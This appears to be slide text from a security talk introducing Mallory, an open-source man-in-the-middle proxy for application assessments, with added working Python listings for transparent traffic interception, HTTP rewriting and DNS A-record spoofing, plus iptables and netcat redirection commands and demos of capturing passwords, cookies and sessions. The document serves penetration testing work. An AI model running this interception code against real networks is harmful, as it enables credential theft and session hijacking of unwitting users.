Who are we? Jeremy Allen, Rajendra Umadas
What do we do? Black box mobile app assessments, thick clients, web apps
Why Mallory exists: proxy setups for apps, throwaway tools that are all similar
“Scratching the itch...” Introducing Mallory: architecture/design, open source tool
Demos
*Updated Slides: http://intrepidusgroup.com/insight/mallory
Youngin’ of the group
Bitten by the security bug in college
Mobile application security == fun
Legacy bugs
First (of many) Black Hats
Mobile app assessments: QUALCOMM/BREW, RIM, WinMo, iPhone, Android
Other devices and product assessments (closed devices)
Assess applications ON the device as delivered
Network focused attacks required
Web application assessments: $$ -- it pays the bills
Blackboxy stuff: thick client apps/plugins that talk somehow
Binary protocols
Mobile applications and thick clients
Often just a thick client using HTTP to transport data
Web applications
May not be real HTTP (AMF, other HTTP-encapsulated binary protocols)
Example: video on demand with HTTP pipelining broke most proxies in some way
The above targets sometimes use proprietary transport protocols.
It may be hard to force a thick client or mobile app to tunnel data through an HTTP proxy even if it uses HTTP for transport.
Web apps may use ActiveX, Flash, or various other modules that add non-standard traffic.
“Roll your own” clients
Many small scripts per engagement
Throwaway code per engagement
Someone else wrote the proxy and we can’t change the code easily
It’s not using HTTP... what is it?
Binary protocols
Multiple streams stuffed into one SSL socket
Example: SSL-protected phone applications, SSL VPNs
Gather data: figure out what we need
Server IP(s)
Server port(s)
TCP or UDP?
Buffer sizes???
Any other anomalous characteristics
Redirect the victim’s traffic to local listeners with iptables (nat table, eth1 facing the victim):
-A PREROUTING -i eth1 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 1231
-A PREROUTING -i eth1 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 1232
-A PREROUTING -i eth1 -p tcp -m tcp --dport 4356 -j REDIRECT --to-ports 1233
netcat
nc -l -p 1231 | nc host 80
nc -l -p 1232 | nc host 443
nc -l -p 1233 | nc host 4356
(a plain pipe only carries the client-to-server direction; the server’s replies need a FIFO or a second pipe back into the listener)
socat
socat -v -v -x tcp-listen:80 host:80
(-v -v -x dumps both directions as hex; add fork to the listen address to handle more than one connection)
Use a scripting language to manipulate traffic in the *cat setup (Python, Ruby, Perl, whatever)
Tool is often very specific to the application being assessed
Requires touchy sniffing, routing, NAT, IPTables and black magic to get it all flowing properly
Brittle
When they just want to make our lives difficult
Rube Goldberg
No one tool solves the problem very generically
Tools work well, just don’t meet some specific requirements (buffer size, platform intricacies, ...)
Common problem that app assessors must solve in a slightly different manner per application and environment
Time to hack it together OR we solve it once generically for the majority of cases (we are lazy)
Existing proxies: WebScarab, Burp, Paros, PFI, others.
Need to configure the application and the proxy for full duplex communication
HTTP proxies don’t always work: NTP, FTP, SSH, SMTP, others
Limitations:
▪ Application might not support a proxy setting
▪ Manual configuration of the proxy endpoint
▪ May still require fancy IPTables, DNS and other control means
Transparent-aware proxy for TCP and UDP
Decode protocols
GUI based “debugger”
Rule system
▪ Edited in a file or in the GUI
▪ Modify traffic on the fly
▪ Determine what traffic is sent to the debugger
Acknowledgements
▪ Mike Zusman (EvProxy)
▪ Aaron Rhodes
▪ Rajendra Umadas (Shaboopi)
▪ Jeremy Allen (Mallory)
▪ Adam Pridgen
▪ Others!
Team provided testing, ideas and code!
Protocols
▪ Currently knows: HTTP, HTTPS, SSL, DNS and SSH
▪ Easy to implement new protocols
Plugins
▪ Per protocol
▪ HTTP and HTTPS well supported at this point
▪ Extensible platform for all MiTM needs on supported protocols
Proxification of traffic
▪ Can turn off transparency awareness and force traffic to an external proxy
Released right now
Available on bitbucket
▪ bitbucket.org/IntrepidusGroup/mallory
Mallory requires root privileges and an entire machine: we use it as a virtual machine mainly.
Mallory is also readily usable as a malicious access point (and many applications necessitate this approach)
Dependencies: Python 2.6, python2.6-dev, python-setuptools, python-pyasn1, python-netfilter, libnetfilter-conntrack-dev, pynetfilter_conntrack, netfilter-extensions-source, libnetfilter-conntrack3-dbg, libnetfilter-conntrack1_0.0.99-1_i386.deb, python-paramiko (http://software.inl.fr/trac/wiki/pynetfilter_conntrack)
Feature comparison (X = supported, * = partial). Columns: Transparent, Application aware, Extensible/programmatic instream modification, Manual instream modification, Non-HTTP.
Mallory: X X X X X
Burp (HTTP proxies): X
PFI: X X X
Cain and Abel: X
Middler: X X
Ettercap: X X X
Netsed: X X
Squid: X * X
Mallory is a standard UDP and TCP server
Two threads per MiTM connection (one for the source and one for the destination)
Traffic directions: “C2S” = client to server, “S2C” = server to client
Plugins are called in the middle of the shovel at the right spots per protocol
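The two-thread shovel described above, written out as an added example (this is not Mallory’s code): a transparent TCP proxy that recovers the pre-REDIRECT destination with SO_ORIGINAL_DST, which is what the iptables REDIRECT rules shown earlier make possible, and hands every buffer to a plugin hook tagged with its direction. The plugin signature, the constant name, the port and the pump_through() harness are assumptions made here for illustration.

```python
"""Skeleton of a Mallory-style transparent TCP proxy (added example, not Mallory's code).

Assumes a Linux box where an iptables nat rule such as
    -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-ports 1232
has steered the victim's connection to our listener, so the kernel can hand
us the original destination via SO_ORIGINAL_DST.
"""
import socket
import struct
import threading

SO_ORIGINAL_DST = 80  # from linux/netfilter_ipv4.h; not exported by Python's socket module


def parse_original_dst(raw):
    """Decode the 16-byte sockaddr_in returned by SO_ORIGINAL_DST.

    Layout: sin_family (2 bytes, host order, skipped), sin_port (2 bytes,
    network order), sin_addr (4 bytes), 8 bytes of zero padding.
    """
    port, addr = struct.unpack("!2xH4s8x", raw[:16])
    return socket.inet_ntoa(addr), port


def original_dst(conn):
    """Where was the redirected client really going (pre-REDIRECT)?"""
    return parse_original_dst(conn.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16))


def shovel(src, dst, direction, plugin=None, bufsize=4096):
    """Copy src -> dst one read at a time; direction is "c2s" or "s2c".

    Every chunk goes through plugin(direction, data) before forwarding: this
    is the spot where Mallory hands traffic to protocol plugins. Returning
    None forwards the chunk unchanged, returning b"" drops it. Reads are
    forwarded as read, not re-buffered, which matters for clients that are
    picky about segment boundaries.
    """
    forwarded = 0
    try:
        while True:
            data = src.recv(bufsize)
            if not data:
                break
            if plugin is not None:
                rewritten = plugin(direction, data)
                if rewritten is not None:
                    data = rewritten
            if data:
                dst.sendall(data)
                forwarded += len(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # pass the half-close on to the peer
        except OSError:
            pass
    return forwarded


def handle_client(client, plugin=None):
    """One MiTM'd connection: two threads, one per direction."""
    server = socket.create_connection(original_dst(client))
    threads = [
        threading.Thread(target=shovel, args=(client, server, "c2s", plugin), daemon=True),
        threading.Thread(target=shovel, args=(server, client, "s2c", plugin), daemon=True),
    ]
    for t in threads:
        t.start()
    return threads


def serve(listen_port, plugin=None):
    """Accept loop. Root is needed for the iptables rule, not for this socket."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind(("0.0.0.0", listen_port))
    lsock.listen(64)
    while True:
        client, _ = lsock.accept()
        handle_client(client, plugin)


def pump_through(payload, plugin=None):
    """Offline harness: push payload through shovel() over socketpairs and
    return (bytes_forwarded, bytes_received), so a plugin can be unit tested
    without iptables or a victim."""
    client_end, proxy_in = socket.socketpair()
    proxy_out, server_end = socket.socketpair()
    result = {}
    worker = threading.Thread(
        target=lambda: result.setdefault("n", shovel(proxy_in, proxy_out, "c2s", plugin)))
    worker.start()
    client_end.sendall(payload)
    client_end.close()  # EOF -> shovel finishes and half-closes proxy_out
    received = b""
    while True:
        chunk = server_end.recv(4096)
        if not chunk:
            break
        received += chunk
    worker.join()
    for s in (proxy_in, proxy_out, server_end):
        s.close()
    return result["n"], received


if __name__ == "__main__":
    serve(1232, plugin=lambda direction, data: data)
```

Run it as root behind the 443 REDIRECT rule and every victim connection to any HTTPS server is accepted locally and relayed to its real destination; with a plugin that simply returns its input it is a passive tap. pump_through() is the piece worth keeping: it lets a plugin be exercised on a captured buffer before it is put in front of a live client.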
Use mercurial and bitbucket to get the tool
* hg clone https://bitbucket.org/IntrepidusGroup/mallory
After hg checkout
Read SETUP README
Options
No transparent
▪ Change listen port
▪ Specify the protocol to use
▪ Removes root and kernel dependencies
Specify the traffic database
Proxify (send to some other destination)
-d / --trafficdb
Specify the traffic database name, default is "trafficdb". SQLite databases are used.
-p / --proto
Specify the protocol to use. This is only useful with the no-transparent option. You must specify the module inside of the protocol package as well as the exact protocol class to instantiate.
Example: -p sslproto.SSLProtocol or -p ssh.SSHProtocol or -p http.HTTP
TABLE: connections
connCount INTEGER: uniquely identifies a TCP stream in this database. Used to JOIN on from the flows table
serverIp TEXT, serverPort INTEGER: original destination where the packet is going (pre-REDIRECT)
clientIp TEXT, clientPort INTEGER: victim client
TABLE: flows
Actual data in connections. Buffer sizes of the real connection are preserved.
conncount INTEGER: unique ID for this flow, maps to connections
direction TEXT: “c2s” / “s2c”
buffindex INTEGER: increasing number for this stream
timestamp FLOAT: seconds since epoch
buffer BLOB: the actual data received
TABLE: dgram (for UDP “connectionless” data)
saddr: IP address in normal dotted quad format
sport INTEGER: source port
daddr: IP address in dotted quad
dport INTEGER: destination port
direction TEXT: “c2s” or “s2c”
body BLOB: the actual data contained in the packet
timestamp: seconds since the epoch
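The schema above, rebuilt as working sqlite3 code (added example, not Mallory’s own code): the table and column names follow the slides, while the helper functions, the in-memory database and the sample traffic are constructed here to show how the flows table is written one read() at a time and joined back to connections.

```python
"""Mallory's traffic database layout rebuilt in sqlite3 (added example, not Mallory's code).

The tables and columns follow the schema described above; the helper
functions and the sample traffic are constructed for illustration.
"""
import sqlite3
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS connections (
    connCount  INTEGER PRIMARY KEY,  -- one row per TCP stream
    serverIp   TEXT,                 -- original (pre-REDIRECT) destination
    serverPort INTEGER,
    clientIp   TEXT,                 -- victim client
    clientPort INTEGER
);
CREATE TABLE IF NOT EXISTS flows (
    conncount INTEGER,  -- joins to connections.connCount
    direction TEXT,     -- "c2s" or "s2c"
    buffindex INTEGER,  -- increasing per stream: replay order
    timestamp FLOAT,    -- seconds since epoch
    buffer    BLOB      -- one read() worth of data, size preserved
);
CREATE TABLE IF NOT EXISTS dgram (
    saddr TEXT, sport INTEGER, daddr TEXT, dport INTEGER,
    direction TEXT, body BLOB, timestamp FLOAT
);
"""

# Constructed sample traffic used by demo() below.
SAMPLE_REQUEST = b"GET /login HTTP/1.1\r\nHost: bank.example\r\n\r\n"
SAMPLE_RESPONSE_HEAD = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\n"
SAMPLE_RESPONSE_BODY = b"ok"


def open_trafficdb(path="trafficdb"):
    """Open (or create) the database; "trafficdb" is the -d/--trafficdb default."""
    db = sqlite3.connect(path)
    db.executescript(SCHEMA)
    return db


def new_connection(db, client, server):
    """Register a MiTM'd TCP stream; returns its connCount."""
    cur = db.execute(
        "INSERT INTO connections (serverIp, serverPort, clientIp, clientPort) VALUES (?, ?, ?, ?)",
        (server[0], server[1], client[0], client[1]))
    db.commit()
    return cur.lastrowid


def record_flow(db, conncount, direction, buf, now=None):
    """Append one read() buffer. buffindex counts per stream, not per
    direction, so the interleaving of c2s and s2c survives for replay."""
    (nxt,) = db.execute(
        "SELECT COALESCE(MAX(buffindex), -1) + 1 FROM flows WHERE conncount = ?",
        (conncount,)).fetchone()
    db.execute("INSERT INTO flows VALUES (?, ?, ?, ?, ?)",
               (conncount, direction, nxt, now or time.time(), buf))
    db.commit()
    return nxt


def record_dgram(db, src, dst, direction, body, now=None):
    """UDP has no stream to join on, so each datagram carries its own addresses."""
    db.execute("INSERT INTO dgram VALUES (?, ?, ?, ?, ?, ?, ?)",
               (src[0], src[1], dst[0], dst[1], direction, body, now or time.time()))
    db.commit()


def reassemble(db, conncount, direction):
    """Glue one direction of a stream back together in buffindex order."""
    rows = db.execute(
        "SELECT buffer FROM flows WHERE conncount = ? AND direction = ? ORDER BY buffindex",
        (conncount, direction))
    return b"".join(bytes(r[0]) for r in rows)


def streams_to(db, server_ip, server_port):
    """Which victims talked to this server, and how much? JOIN flows -> connections."""
    rows = db.execute("""
        SELECT c.clientIp, c.clientPort, COUNT(f.buffindex), SUM(LENGTH(f.buffer))
        FROM connections c JOIN flows f ON f.conncount = c.connCount
        WHERE c.serverIp = ? AND c.serverPort = ?
        GROUP BY c.connCount ORDER BY c.connCount""", (server_ip, server_port))
    return [tuple(r) for r in rows]


def demo():
    """Populate an in-memory database with the constructed sample traffic."""
    db = open_trafficdb(":memory:")
    cid = new_connection(db, ("192.168.1.50", 51234), ("203.0.113.10", 80))
    record_flow(db, cid, "c2s", SAMPLE_REQUEST)
    record_flow(db, cid, "s2c", SAMPLE_RESPONSE_HEAD)
    record_flow(db, cid, "s2c", SAMPLE_RESPONSE_BODY)
    record_dgram(db, ("192.168.1.50", 40000), ("203.0.113.53", 53), "c2s", b"\x12\x34\x01" + b"\x00" * 9)
    return db, cid


if __name__ == "__main__":
    db, cid = demo()
    print(reassemble(db, cid, "s2c"))
    print(streams_to(db, "203.0.113.10", 80))
```

Because buffer sizes are preserved rather than coalesced, reassemble() is only a convenience for reading; the per-buffer rows are what you replay when a client turns out to depend on how the server split its writes.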
“Debugging clients” use XMLRPC to talk to the Mallory server
Mallory has a GUI interface and a prototype-style CLI interface
CLI is just to show how to interact with the GUI
Protocol decoding implementations
Plugins are how we want everyone to extend existing protocols
Plugins and protocols are clean abstractions
We tried hard to make this neat and tidy
We already use this and write custom protocols and plugins for engagements
TODO: Documentation (coming to a bitbucket repository near you)
SSH MiTM
Overview of Python Paramiko
Things we will be doing soon: port forwarding
Logging of SSH data
I hacked your bank (HTTPS)
All your passwords and cookies are captured by Mallory (once the client accepts Mallory’s on-the-fly certificate)
Mobile apps like HTTP. HTTP is EVERYWHERE
Custom logging of HTTP data
Walk through a stream editing scenario
Walk through rule editing and explain the rule system in more detail if we need to
Show stream editing
Show how cool rules are: MuckPipe! Show off the gzipstripper and then replace something.
Replaces NetSed; can be modified in the rule GUI
Autosend and rules make it easy to get to the data you need
Show the command line version and the GUI
Show GZIP / Deflate removal
Show VNC hax
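Two rules of the kind MuckPipe applies, written out as an added example (this is not the gzipstripper or MuckPipe source, and the rule interface, a callable taking the direction and a buffer, is assumed here to match the c2s/s2c naming used above): stripping Accept-Encoding on the client side so responses arrive uncompressed, and a NetSed-style body replace that keeps Content-Length consistent instead of blindly swapping bytes.

```python
"""Two Mallory-style HTTP rules (added example; not the MuckPipe/gzipstripper code).

The rule interface (a callable taking direction and a buffer, returning the
buffer to forward) is an assumption made for illustration.
"""
import re

HEADER_END = b"\r\n\r\n"


def split_message(data):
    """Return (head, body). head includes the terminating CRLFCRLF; if the
    buffer holds no complete header block, everything is treated as head."""
    i = data.find(HEADER_END)
    if i < 0:
        return data, b""
    i += len(HEADER_END)
    return data[:i], data[i:]


def strip_accept_encoding(direction, data):
    """c2s rule: drop Accept-Encoding so the server answers uncompressed.

    Rewriting a gzip'd response in flight means inflating, editing and
    re-deflating it; rewriting the request so there is no gzip to begin
    with is one regex. This is the GZIP/Deflate removal trick.
    """
    if direction != "c2s":
        return data
    head, body = split_message(data)
    head = re.sub(rb"(?im)^Accept-Encoding:[^\r\n]*\r\n", b"", head)
    return head + body


def make_replace_rule(old, new):
    """netsed-style find/replace on the body that keeps Content-Length honest.

    A blind replace that changes the body size leaves the declared length
    wrong; the client then hangs waiting for bytes or truncates the page.
    """
    def rule(direction, data):
        head, body = split_message(data)
        if old not in body:
            return data
        m = re.search(rb"(?im)^Content-Length:\s*(\d+)\r\n", head)
        declared = int(m.group(1)) if m else None
        if declared is not None and declared != len(body) and len(old) != len(new):
            # Only part of the body is in this buffer: a size-changing edit
            # would desync the framing, so leave it alone.
            return data
        new_body = body.replace(old, new)
        if declared is not None and declared == len(body):
            head = head[:m.start(1)] + str(len(new_body)).encode("ascii") + head[m.end(1):]
        return head + new_body
    return rule


def apply_rules(rules, direction, data):
    """Run a buffer through the rule chain in order."""
    for rule in rules:
        data = rule(direction, data)
    return data


if __name__ == "__main__":
    rules = [strip_accept_encoding, make_replace_rule(b"victim", b"Mallory")]
    print(apply_rules(rules, "c2s", b"GET / HTTP/1.1\r\nAccept-Encoding: gzip\r\n\r\n"))
```

The replace rule only edits a buffer that carries the whole declared body; a body that spans several reads, or one sent with chunked transfer encoding, needs the protocol-aware reassembly that an HTTP plugin does rather than a per-buffer rule.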
Quick code walkthrough of why HTTPS and the architecture is beautiful
Show how we generate certificates on the fly and why that is cool
Future: zero byte size, on the fly, in-memory certificates
HTTP -- Session hijacking
Show off the Chrome session hijacking plugin
Capture session data, visit site, pwn
Useful for mobile apps whose session we then want to load in a real browser
And, of course, it is session hijacking in two clicks
Explain SOP and why we used a plugin
Show some more code! Less than one hundred lines of code for the Mallory part
HTTP -- Image inversion
You may have already seen this ;-)
Very neat because it is a very simple plugin. Showcase the ease of implementing this plugin. Make anyone feel like they can write a Mallory plugin
Most applications use DNS to find their target server
We can use our DNS A-record lookup module to easily send it to an internal server
Future: make this a plugin, as it should be. Integrate this into the GUI. Not done yet because it is something that gets changed once
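An A-record spoofer of the kind referred to above, as an added example (this is not Mallory’s DNS module; the match callback, the redirect address and the upstream relay in serve_udp() are assumptions made for illustration): it parses the question of an incoming query, answers A/IN lookups for names we care about with our own address, and leaves everything else to a real resolver.

```python
"""DNS A-record redirection in the style of Mallory's DNS module (added example, not Mallory's code).

Only the wire-format handling is generic; the match callback and the
serve_udp() relay to an upstream resolver are assumptions for illustration.
"""
import socket
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    """'api.bank.example' -> b'\\x03api\\x04bank\\x07example\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(packet, offset):
    """Read a (possibly compressed) name; returns (name, offset after it)."""
    labels, end = [], None
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", packet[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def build_query(name, qtype=TYPE_A, txid=0x1234):
    """A plain recursive query as a stub resolver sends it (constructed input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def parse_question(packet):
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount != 1:
        return None  # a response, or not the simple single-question case
    name, off = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, name, qtype, qclass, packet[12:off + 4]


def spoof_a(packet, redirect_ip, ttl=60, match=None):
    """Answer an A query with redirect_ip. Returns None when the query should
    be relayed untouched (non-A/IN, a response, or a name we do not match)."""
    parsed = parse_question(packet)
    if parsed is None:
        return None
    txid, name, qtype, qclass, question = parsed
    if (qtype, qclass) != (TYPE_A, CLASS_IN) or (match is not None and not match(name)):
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA; NOERROR
    answer = (b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)
              + socket.inet_aton(redirect_ip))
    return header + question + answer


def parse_a_answers(packet):
    """(name, ip, ttl) for each A record in the answer section."""
    qdcount, ancount = struct.unpack("!HH", packet[4:8])
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(packet, off)
        off += 4
    out = []
    for _ in range(ancount):
        name, off = decode_name(packet, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        if (rtype, rclass) == (TYPE_A, CLASS_IN):
            out.append((name, socket.inet_ntoa(packet[off:off + 4]), ttl))
        off += rdlen
    return out


def serve_udp(redirect_ip, match, upstream=("8.8.8.8", 53), listen=("0.0.0.0", 53)):
    """Spoof matching A lookups, relay everything else to a real resolver."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(listen)
    relay = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    relay.settimeout(3)
    while True:
        packet, client = sock.recvfrom(512)
        reply = spoof_a(packet, redirect_ip, match=match)
        if reply is None:
            relay.sendto(packet, upstream)
            try:
                reply, _ = relay.recvfrom(4096)
            except socket.timeout:
                continue
        sock.sendto(reply, client)


if __name__ == "__main__":
    serve_udp("10.0.0.5", match=lambda n: n.endswith("bank.example"))
```

The victim only asks this resolver if it is told to (the malicious access point’s DHCP, or a port 53 REDIRECT like the TCP rules earlier), and an application that hard-codes its server IP never asks at all; that is when the transparent TCP path rather than DNS has to do the redirection.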
Mallory: generic TCP and UDP MiTM proxy
Extensible, versatile, open source.
Blog: http://intrepidusgroup.com/insight
twitter.com/intrepidusgroup
Keep up on the project here: http://bitbucket.org/IntrepidusGroup/mallory
http://intrepidusgroup.com/insight/mallory